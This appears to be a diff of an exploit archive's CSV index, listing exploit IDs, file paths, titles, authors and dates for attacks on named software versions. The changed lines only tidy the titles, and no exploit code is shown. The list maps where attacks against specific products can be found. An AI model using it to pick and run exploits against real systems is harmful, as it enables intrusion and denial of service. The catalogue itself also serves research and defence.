20915,platforms/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Privilege Escalation",2012-08-29,"Craig Freyman",windows,local,0 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0 -20918,platforms/php/webapps/20918.txt,"Wordpress HD Webplayer 1.1 Plugin - SQL Injection",2012-08-29,JoinSe7en,php,webapps,0 +20918,platforms/php/webapps/20918.txt,"WordPress HD Webplayer 1.1 Plugin - SQL Injection",2012-08-29,JoinSe7en,php,webapps,0 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0 20923,platforms/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,unix,local,0 @@ -18229,10 +18230,10 @@ id,file,description,date,author,platform,type,port 20927,platforms/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 - BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",linux,local,0 20928,platforms/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Buffer Overflow",2001-06-15,MasterSecuritY,linux,local,0 20929,platforms/linux/remote/20929.c,"ghttpd 1.4 - Daemon Buffer Overflow",2001-06-17,qitest1,linux,remote,0 -20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 - ISAPI Extension Buffer Overflow (1)",2001-06-18,Ps0,windows,dos,0 -20931,platforms/windows/remote/20931.c,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 - ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,windows,remote,0 -20932,platforms/windows/remote/20932.sh,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 - ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,windows,remote,0 -20933,platforms/windows/remote/20933.pl,"Microsoft Index Server 2.0 and Indexing Service for Win 2000 - ISAPI Extension Buffer Overflow (4)",2001-06-18,blackangels,windows,remote,0 +20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (1)",2001-06-18,Ps0,windows,dos,0 +20931,platforms/windows/remote/20931.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (2)",2001-06-21,hsj,windows,remote,0 +20932,platforms/windows/remote/20932.sh,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (3)",2001-06-18,mat,windows,remote,0 +20933,platforms/windows/remote/20933.pl,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (4)",2001-06-18,blackangels,windows,remote,0 20934,platforms/windows/remote/20934.txt,"Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure",2001-06-18,"SNS Research",windows,remote,0 20935,platforms/cgi/remote/20935.pl,"Microburst uDirectory 2.0 - Remote Command Execution",2001-06-18,"Igor Dobrovitski",cgi,remote,0 20936,platforms/linux/remote/20936.c,"NetSQL 1.0 - Remote Buffer Overflow",2001-06-15,"Sergio Monteiro",linux,remote,0 @@ -18268,7 +18269,7 @@ id,file,description,date,author,platform,type,port 20968,platforms/unix/remote/20968.txt,"Samba 2.0.x/2.2 - Arbitrary File Creation",2001-06-23,"Michal Zalewski",unix,remote,0 20969,platforms/solaris/local/20969.c,"Solaris 8 libsldap - Buffer Overflow (1)",2001-06-26,noir,solaris,local,0 20970,platforms/solaris/local/20970.c,"Solaris 8 libsldap - Buffer Overflow (2)",2001-06-27,Fyodor,solaris,local,0 -20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - .png Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0 +20971,platforms/windows/dos/20971.txt,"Adobe Photoshop CS6 - '.png' Parsing Heap Overflow",2012-09-01,"Francis Provencher",windows,dos,0 20972,platforms/multiple/remote/20972.txt,"Icecast 1.1.x/1.3.x - Directory Traversal",2001-06-26,gollum,multiple,remote,0 20973,platforms/multiple/dos/20973.txt,"Icecast 1.1.x/1.3.x - Slash File Name Denial of Service",2001-06-26,gollum,multiple,dos,0 20974,platforms/solaris/local/20974.c,"Solaris 2.6/2.6/7.0/8 whodo - Buffer Overflow",2001-06-01,"Pablo Sor",solaris,local,0 @@ -18276,12 +18277,12 @@ id,file,description,date,author,platform,type,port 20976,platforms/hardware/remote/20976.c,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (2)",2001-06-27,"Eliel C. Sardanons",hardware,remote,0 20977,platforms/hardware/remote/20977.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (3)",2001-03-07,hypoclear,hardware,remote,0 20978,platforms/hardware/remote/20978.pl,"Cisco IOS 11.x/12.x - HTTP Configuration Arbitrary Administrative Access (4)",2001-06-27,blackangels,hardware,remote,0 -20979,platforms/linux/local/20979.c,"Linux Kernel 2.2 / 2.4 - procfs Stream Redirection to Process Memory Privilege Escalation",2001-06-27,zen-parse,linux,local,0 +20979,platforms/linux/local/20979.c,"Linux Kernel 2.2 / 2.4 - procfs Stream redirection to Process Memory Privilege Escalation",2001-06-27,zen-parse,linux,local,0 20980,platforms/windows/remote/20980.c,"Oracle 8i - TNS Listener Buffer Overflow",2001-07-20,benjurry,windows,remote,0 -20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 - (Build 8410) Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 +20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 20982,platforms/cgi/remote/20982.pl,"Active Classifieds 1.0 - Arbitrary Code Execution",2001-06-28,"Igor Dobrovitski",cgi,remote,0 20983,platforms/php/webapps/20983.pl,"Joomla Spider Calendar Lite (com_spidercalendar) - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 -20984,platforms/osx/remote/20984.txt,"Apple Mac OSX 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0 +20984,platforms/osx/remote/20984.txt,"Apple Mac OS X 10 - nidump Password File Disclosure",2001-06-26,"Steven Kreuzer",osx,remote,0 20985,platforms/php/local/20985.php,"PHP 4.x - SafeMode Arbitrary File Execution",2001-06-30,"Wojciech Purczynski",php,local,0 20986,platforms/linux/local/20986.c,"Xvt 2.1 - Buffer Overflow",2001-07-02,"Christophe Bailleux",linux,local,0 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0 @@ -18304,7 +18305,7 @@ id,file,description,date,author,platform,type,port 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution",2001-07-12,"Georgi Guninski",windows,remote,0 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive Denial of Service",2001-07-12,"Michel Arboi",windows,dos,0 -21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 +21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption",2001-07-12,byterage,windows,remote,0 21010,platforms/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan - ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local,0 @@ -18324,11 +18325,11 @@ id,file,description,date,author,platform,type,port 21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0 21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0 -21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0 +21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21034,platforms/windows/remote/21034.rb,"SAP NetWeaver Dispatcher - DiagTraceR3Info Buffer Overflow",2012-09-07,Metasploit,windows,remote,3200 -21035,platforms/windows/remote/21035.txt,"Snapstream PVS 1.2 - Plaintext Password",2001-07-26,John,windows,remote,0 +21035,platforms/windows/remote/21035.txt,"SnapStream PVS 1.2 - Plaintext Password",2001-07-26,John,windows,remote,0 21036,platforms/windows/remote/21036.pl,"WS-FTP 2.0 - Anonymous Multiple FTP Command Buffer Overflow",2001-07-25,andreas,windows,remote,0 21037,platforms/linux/remote/21037.c,"GNU groff 1.1x - xploitation Via LPD",2001-06-23,zen-parse,linux,remote,0 21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,php,webapps,0 @@ -18338,7 +18339,7 @@ id,file,description,date,author,platform,type,port 21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 - Locate Arbitrary Command Execution",2001-08-01,"Josh Smith",linux,local,0 21044,platforms/windows/local/21044.c,"Oracle 8/9i - DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 - Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 -21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 +21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query manipulation",2001-08-03,kill-9,php,webapps,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 - NT4ALL Denial of Service",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - Denial of Service",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 @@ -18348,8 +18349,8 @@ id,file,description,date,author,platform,type,port 21053,platforms/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps,0 21056,platforms/php/webapps/21056.txt,"Group Office Calendar - 'calendar/json.php' SQL Injection",2012-09-04,"Chris Cooper",php,webapps,0 -21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4/5/6 - Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote,0 -21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 -(SPARC) xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 +21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote,0 +21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 (SPARC) - xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 21059,platforms/solaris/local/21059.c,"Solaris 8 - x86 xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 21060,platforms/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (1)",2001-08-17,grange,linux,local,0 21061,platforms/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,linux,local,0 @@ -18362,7 +18363,7 @@ id,file,description,date,author,platform,type,port 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 - File Retrieval",2001-08-31,"Hannibal Lector",cgi,remote,0 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 - RunAs Service Named Pipe Hijacking",2001-12-11,Camisade,windows,local,0 21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 - Insecure Password",2001-08-15,"Macintosh Security",osx,local,0 -21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0 +21071,platforms/windows/local/21071.c,"Microsoft IIS 4.0/5.0 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0 21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation",2001-08-15,"Digital Offense",windows,local,0 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local,0 21074,platforms/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 @@ -18440,12 +18441,12 @@ id,file,description,date,author,platform,type,port 21152,platforms/linux/remote/21152.c,"ActivePerl 5.6.1 - perlIIS.dll Buffer Overflow (1)",2001-11-15,Indigo,linux,remote,0 21153,platforms/windows/remote/21153.c,"ActivePerl 5.6.1 - perlIIS.dll Buffer Overflow (2)",2001-11-15,Indigo,windows,remote,0 21154,platforms/multiple/remote/21154.pl,"ActivePerl 5.6.1 - perlIIS.dll Buffer Overflow (3)",2001-11-15,Sapient2003,multiple,remote,0 -21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHP-Nuke Addon - Metacharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0 +21155,platforms/php/remote/21155.txt,"Network Tool 0.2 PHP-Nuke Addon - MetaCharacter Filtering Command Execution",2001-11-16,"Cabezon Aurélien",php,remote,0 21156,platforms/windows/remote/21156.txt,"Opera 5.0/5.1 - Same Origin Policy Circumvention",2001-11-15,"Georgi Guninski",windows,remote,0 -21157,platforms/php/webapps/21157.txt,"bharat mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",php,webapps,0 +21157,platforms/php/webapps/21157.txt,"bharat Mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",php,webapps,0 21158,platforms/linux/local/21158.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String",2001-11-21,IhaQueR@IRCnet,linux,local,0 21159,platforms/linux/local/21159.c,"S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow",2001-11-21,IhaQueR@IRCnet,linux,local,0 -21160,platforms/multiple/remote/21160.txt,"ibm informix Web datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote,0 +21160,platforms/multiple/remote/21160.txt,"ibm informix Web Datablade 3.x/4.1 - Directory Traversal",2001-11-22,"Beck Mr.R",multiple,remote,0 21161,platforms/unix/remote/21161.txt,"WU-FTPD 2.6 - File Globbing Heap Corruption",2001-11-27,"Core Security Technologies",unix,remote,0 21162,platforms/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (1)",2001-11-29,"Alex Hernandez",windows,dos,0 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (2)",2001-11-29,"Alex Hernandez",windows,dos,0 @@ -18473,10 +18474,10 @@ id,file,description,date,author,platform,type,port 21185,platforms/unix/remote/21185.sh,"QPopper 4.0.x - PopAuth Trace File Shell Command Execution",2001-12-18,IhaQueR,unix,remote,0 21186,platforms/hardware/remote/21186.txt,"ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 - Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",cgi,webapps,0 -21188,platforms/windows/remote/21188.c,"Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (1)",2001-12-20,"Gabriel Maggiotti",windows,remote,0 -21189,platforms/windows/remote/21189.c,"Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (2)",2001-12-20,JOCANOR,windows,remote,0 +21188,platforms/windows/remote/21188.c,"Microsoft Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (1)",2001-12-20,"Gabriel Maggiotti",windows,remote,0 +21189,platforms/windows/remote/21189.c,"Microsoft Windows 98/XP/ME - UPnP NOTIFY Buffer Overflow (2)",2001-12-20,JOCANOR,windows,remote,0 21190,platforms/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution",2012-09-10,Metasploit,linux,remote,0 -21191,platforms/linux/remote/21191.rb,"Openfiler 2.x - NetworkCard Command Execution",2012-09-10,Metasploit,linux,remote,0 +21191,platforms/linux/remote/21191.rb,"OpenFiler 2.x - NetworkCard Command Execution",2012-09-10,Metasploit,linux,remote,0 21192,platforms/linux/remote/21192.c,"STunnel 3.x - Client Negotiation Protocol Format String",2001-12-22,deltha,linux,remote,0 21193,platforms/multiple/remote/21193.txt,"DeleGate 7.7.1 - Cross-Site Scripting",2001-12-28,"SNS Research",multiple,remote,0 21194,platforms/cgi/remote/21194.txt,"Abe Timmerman - zml.cgi File Disclosure",2001-12-31,blackshell,cgi,remote,0 @@ -18501,13 +18502,13 @@ id,file,description,date,author,platform,type,port 21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0 21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0 21214,platforms/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote,0 -21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR Metacharacter Command Execution",2002-01-11,UNYUN,unix,remote,0 +21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR MetaCharacter Command Execution",2002-01-11,UNYUN,unix,remote,0 21216,platforms/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,linux,local,0 21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local,0 21218,platforms/linux/local/21218.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (3)",2002-01-13,anonymous,linux,local,0 21219,platforms/linux/local/21219.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (4)",2002-01-13,"Karol Wiesek",linux,local,0 21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 -21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component - 'index.php module parameter' Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 +21221,platforms/php/webapps/21221.txt,"Joomla RokModule Component - 'index.php module Parameter' Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps,0 21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0 21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0 @@ -18523,12 +18524,12 @@ id,file,description,date,author,platform,type,port 21235,platforms/windows/remote/21235.pl,"Citrix Nfuse 1.6 - Published Applications Information Leak",2002-01-22,"Ian Vitek",windows,remote,0 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos,0 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",windows,dos,0 -21238,platforms/osx/remote/21238.txt,"Apple MacOS Internet Explorer 3/4/5 - File Execution",2002-01-22,"Jass Seljamaa",osx,remote,0 +21238,platforms/osx/remote/21238.txt,"Apple Mac OS Internet Explorer 3/4/5 - File Execution",2002-01-22,"Jass Seljamaa",osx,remote,0 21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 - WebTop SCOAdminReg.cgi Arbitrary Command Execution",2002-01-20,jGgM,unixware,local,0 -21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - .Manifest Denial of Service",2002-01-21,mosestycoon,windows,dos,0 +21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,windows,dos,0 21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Inclusion",2002-01-02,"Scott Moonen",php,webapps,0 21242,platforms/linux/remote/21242.c,"rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution",2002-01-25,sorbo,linux,remote,0 -21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing Vulnerabililty",2001-12-20,"Dave Plonka",hardware,remote,0 +21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector - Half-Closed HTTP Request IP Address Revealing",2001-12-20,"Dave Plonka",hardware,remote,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 - gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 21245,platforms/windows/dos/21245.c,"Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0 21246,platforms/windows/dos/21246.c,"Microsoft Windows 2000/NT 4 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0 @@ -18547,9 +18548,9 @@ id,file,description,date,author,platform,type,port 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",unix,dos,0 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0 21263,platforms/cgi/remote/21263.txt,"Faq-O-Matic 2.6/2.7 - Cross-Site Scripting",2002-02-04,superpetz,cgi,remote,0 -21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention (1)",2002-02-03,"Dave Wilson",php,remote,0 -21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention (2)",2002-02-03,anonymous,php,remote,0 -21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention (3)",2002-02-03,anonymous,php,remote,0 +21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)",2002-02-03,"Dave Wilson",php,remote,0 +21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)",2002-02-03,anonymous,php,remote,0 +21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)",2002-02-03,anonymous,php,remote,0 21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - Cross-Site Request Forgery (Add Admin) Exploit",2012-09-12,LiquidWorm,php,webapps,0 21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0 21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 @@ -18562,10 +18563,10 @@ id,file,description,date,author,platform,type,port 21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,multiple,remote,0 21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 - 'index.php' Directory Traversal",2002-02-04,frog,php,webapps,0 21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 - view.php Directory Traversal",2002-02-04,frog,php,webapps,0 -21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie Manipulation",2002-02-04,frog,php,webapps,0 +21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 - Cookie manipulation",2002-02-04,frog,php,webapps,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0 -21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Relative Path Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0 +21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0 21283,platforms/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,multiple,local,0 21284,platforms/unixware/local/21284.c,"Caldera UnixWare 7.1.1 - Message Catalog Environment Variable Format String",2002-02-07,jGgM,unixware,local,0 21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0 @@ -18574,10 +18575,10 @@ id,file,description,date,author,platform,type,port 21288,platforms/multiple/local/21288.txt,"Sawmill 6.2.x - AdminPassword Insecure Default Permissions",2002-02-11,darky0da,multiple,local,0 21289,platforms/linux/remote/21289.c,"Ettercap 0.6.3.1 - Large Packet Buffer Overflow",2002-02-14,"Fermín J. Serna",linux,remote,0 21290,platforms/unix/local/21290.sh,"Tarantella Enterprise 3 - Symbolic Link",2002-02-19,"Larry W. Cashdollar",unix,local,0 -21291,platforms/windows/remote/21291.pl,"phusion webserver 1.0 - Directory Traversal (1)",2002-02-16,"Alex Hernandez",windows,remote,0 -21292,platforms/windows/remote/21292.pl,"phusion webserver 1.0 - Directory Traversal (2)",2002-02-16,"Alex Hernandez",windows,remote,0 -21293,platforms/windows/dos/21293.pl,"Phusion Webserver 1.0 - Long URL Denial of Service",2002-02-16,"Alex Hernandez",windows,dos,0 -21294,platforms/windows/remote/21294.c,"Phusion Webserver 1.0 - Long URL Buffer Overflow",2002-02-16,"Alex Hernandez",windows,remote,0 +21291,platforms/windows/remote/21291.pl,"phusion WebServer 1.0 - Directory Traversal (1)",2002-02-16,"Alex Hernandez",windows,remote,0 +21292,platforms/windows/remote/21292.pl,"phusion WebServer 1.0 - Directory Traversal (2)",2002-02-16,"Alex Hernandez",windows,remote,0 +21293,platforms/windows/dos/21293.pl,"Phusion WebServer 1.0 - Long URL Denial of Service",2002-02-16,"Alex Hernandez",windows,dos,0 +21294,platforms/windows/remote/21294.c,"Phusion WebServer 1.0 - Long URL Buffer Overflow",2002-02-16,"Alex Hernandez",windows,remote,0 21295,platforms/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",multiple,remote,0 21296,platforms/hardware/dos/21296.c,"Cisco IOS 11/12 - Malformed SNMP Message Denial of Service",2002-02-12,kundera,hardware,dos,0 21297,platforms/unix/remote/21297.c,"Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow",2002-02-21,gunzip,unix,remote,0 @@ -18587,7 +18588,7 @@ id,file,description,date,author,platform,type,port 21301,platforms/php/webapps/21301.txt,"OpenBB 1.0.x - Image Tag Cross-Agent Scripting",2002-02-25,skizzik,php,webapps,0 21302,platforms/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local,0 21303,platforms/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 - Directory Traversal",2002-02-26,"Strumpf Noir Society",windows,remote,0 -21304,platforms/php/webapps/21304.txt,"Ikonboard 2.17/3.0/3.1 - Image Tag Cross-Agent Scripting",2002-02-26,godminus,php,webapps,0 +21304,platforms/php/webapps/21304.txt,"IkonBoard 2.17/3.0/3.1 - Image Tag Cross-Agent Scripting",2002-02-26,godminus,php,webapps,0 21305,platforms/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service",2002-02-27,"Limpid Byte",windows,dos,0 21306,platforms/windows/dos/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service",2002-02-27,"Limpid Byte",windows,dos,0 